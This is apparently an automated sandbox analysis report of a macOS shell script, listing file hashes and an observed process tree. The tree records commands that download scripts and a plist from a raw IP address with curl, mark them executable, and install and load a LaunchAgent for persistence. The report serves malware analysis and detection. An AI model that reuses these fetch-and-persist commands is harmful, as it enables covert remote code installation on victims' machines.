7b03094e8c2e9903b8642fe091885d13869c0108d8e65d3d906308afb9b7ed66

Analysis

max time kernel
135s
max time network
126s
platform
macos_amd64
resource
macos-20220504-en
resource tags

arch:amd64arch:i386image:macos-20220504-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
10/10/2022, 20:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2.sh
Size

421B
MD5

415390df0220bd22a758d27274a73de7
SHA1

8918d932f939634502e49543fe734ae33092f884
SHA256

7b03094e8c2e9903b8642fe091885d13869c0108d8e65d3d906308afb9b7ed66
SHA512

10426fe1349abcac55d0a3607342531237a030c1dc1088a310a45f5b89dfb8867105baad0ab57504efdb4cea466a9741c34dcb1af3691951c5f1e57286a4fa87

Score

1^/10

Malware Config

Signatures

/usr/sbin/spctl
/usr/sbin/spctl --status
1⤵
PID:489

/usr/sbin/spctl
/usr/sbin/spctl --test-devid-status
1⤵
PID:491

/usr/bin/syslog
/usr/bin/syslog -s -k com.apple.message.domain com.apple.security.assessment.current_state com.apple.message.signature "assessments enabled" com.apple.message.signature2 "devid enabled" Message "Gatekeeper state assessments enabled/devid enabled"
1⤵
PID:492

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/2.sh\""
1⤵
PID:493

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/2.sh\""
1⤵
PID:493

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/2.sh\""
1⤵
PID:493

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/2.sh
1⤵
PID:493

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/2.sh
1⤵
PID:493
- /bin/zsh
  /bin/zsh -c /Users/run/2.sh
  2⤵
  PID:514
- /bin/zsh
  /bin/zsh -c /Users/run/2.sh
  2⤵
  PID:514
- /Users/run/2.sh
  /Users/run/2.sh
  2⤵
  PID:514
- /Users/run/2.sh
  /Users/run/2.sh
  2⤵
  PID:514
- /bin/sh
  sh /Users/run/2.sh
  2⤵
  PID:514
- /bin/sh
  sh /Users/run/2.sh
  2⤵
  PID:514
- /bin/bash
  sh /Users/run/2.sh
  2⤵
  PID:514
- /bin/bash
  sh /Users/run/2.sh
  2⤵
  PID:514
- - /usr/bin/curl
    curl -s http://45.76.163.21:8001/1.sh -o 1.sh
    3⤵
    PID:515
- - /usr/bin/curl
    curl -s http://45.76.163.21:8001/1.sh -o 1.sh
    3⤵
    PID:515
- - /usr/bin/curl
    curl -s http://45.76.163.21:8001/3.sh -o 3.sh
    3⤵
    PID:520
- - /usr/bin/curl
    curl -s http://45.76.163.21:8001/3.sh -o 3.sh
    3⤵
    PID:520
- - /bin/chmod
    chmod +x 1.sh
    3⤵
    PID:522
- - /bin/chmod
    chmod +x 1.sh
    3⤵
    PID:522
- - /bin/chmod
    chmod +x 3.sh
    3⤵
    PID:523
- - /bin/chmod
    chmod +x 3.sh
    3⤵
    PID:523
- - /bin/mkdir
    mkdir /Users/run/Library/1
    3⤵
    PID:524
- - /bin/mkdir
    mkdir /Users/run/Library/1
    3⤵
    PID:524
- - /usr/bin/curl
    curl -s http://45.76.163.21:8001/com.test3.plist -o com.test3.plist
    3⤵
    PID:525
- - /usr/bin/curl
    curl -s http://45.76.163.21:8001/com.test3.plist -o com.test3.plist
    3⤵
    PID:525
- - /bin/cp
    cp /Users/run/Library/1/com.test3.plist /Users/run/Library/LaunchAgents/com.test3.plist
    3⤵
    PID:526
- - /bin/cp
    cp /Users/run/Library/1/com.test3.plist /Users/run/Library/LaunchAgents/com.test3.plist
    3⤵
    PID:526
- - /bin/launchctl
    launchctl load /Users/run/Library/LaunchAgents/com.test3.plist
    3⤵
    PID:527
- - /bin/launchctl
    launchctl load /Users/run/Library/LaunchAgents/com.test3.plist
    3⤵
    PID:527
- - /bin/rm
    rm /Users/Shared/com.test3.plist
    3⤵
    PID:528
- - /bin/rm
    rm /Users/Shared/com.test3.plist
    3⤵
    PID:528

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/Shared/1.sh

Filesize
56B

MD5
2255eb197dbd3d7e325894ee01dceea7

SHA1
a76b827160401a905eabe6c96d4e5a61f70143c3

SHA256
1b920c5eb1b0be607d72d552f9a346205eef1c2ed6557ff96ee5acfbc1ed1b7a

SHA512
f93fcf11b355c675c600a4e7572c1819e1fdf51520bcf8c4711917d767aee331f3ded8a475e6f38fcf06b730bf567aff6345914d1c51971ff1212835973dff01

Download Submit
/Users/Shared/3.sh

Filesize
244B

MD5
09661372395661b3be9d814a1575f629

SHA1
b4d8f2da86b2e071304867aa2ecf3693f2a84446

SHA256
d82a95714fb2b4f9f1407458b0d8a8301d133f68424bee30e9ff08659aa398e5

SHA512
9dc88c4c01a5a33e13ebb35d97e99990066d40ffe14f2b257af33b515a40d0982d1fc43420ee719f7217b050cf67b2abf5214f4b4ff8e477f5b82a89aae32245

Download Submit
/Users/run/Library/1/com.test3.plist

Filesize
436B

MD5
2ff41f9d7e8c4f3578e7ff6c9541fe29

SHA1
7ac993efb7355bbe2f5c27b6f83fca3cb840871c

SHA256
5c59df5665fac8d0e4c9b4eceacce59f1cdee66972b5de435702029e698e6bdd

SHA512
7838df425041e4e11cd9b40d60dc8969018a4e1c7804c7851730382705ec82baec084ac26bd73c554e019330ede5e4e0a63729a679c9164cf0cc2c4b6044bb1c

Download Submit
/Users/run/Library/1/com.test3.plist

Filesize
436B

MD5
2ff41f9d7e8c4f3578e7ff6c9541fe29

SHA1
7ac993efb7355bbe2f5c27b6f83fca3cb840871c

SHA256
5c59df5665fac8d0e4c9b4eceacce59f1cdee66972b5de435702029e698e6bdd

SHA512
7838df425041e4e11cd9b40d60dc8969018a4e1c7804c7851730382705ec82baec084ac26bd73c554e019330ede5e4e0a63729a679c9164cf0cc2c4b6044bb1c

Download Submit
/Users/run/Library/LaunchAgents/com.test3.plist

Filesize
436B

MD5
2ff41f9d7e8c4f3578e7ff6c9541fe29

SHA1
7ac993efb7355bbe2f5c27b6f83fca3cb840871c

SHA256
5c59df5665fac8d0e4c9b4eceacce59f1cdee66972b5de435702029e698e6bdd

SHA512
7838df425041e4e11cd9b40d60dc8969018a4e1c7804c7851730382705ec82baec084ac26bd73c554e019330ede5e4e0a63729a679c9164cf0cc2c4b6044bb1c

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads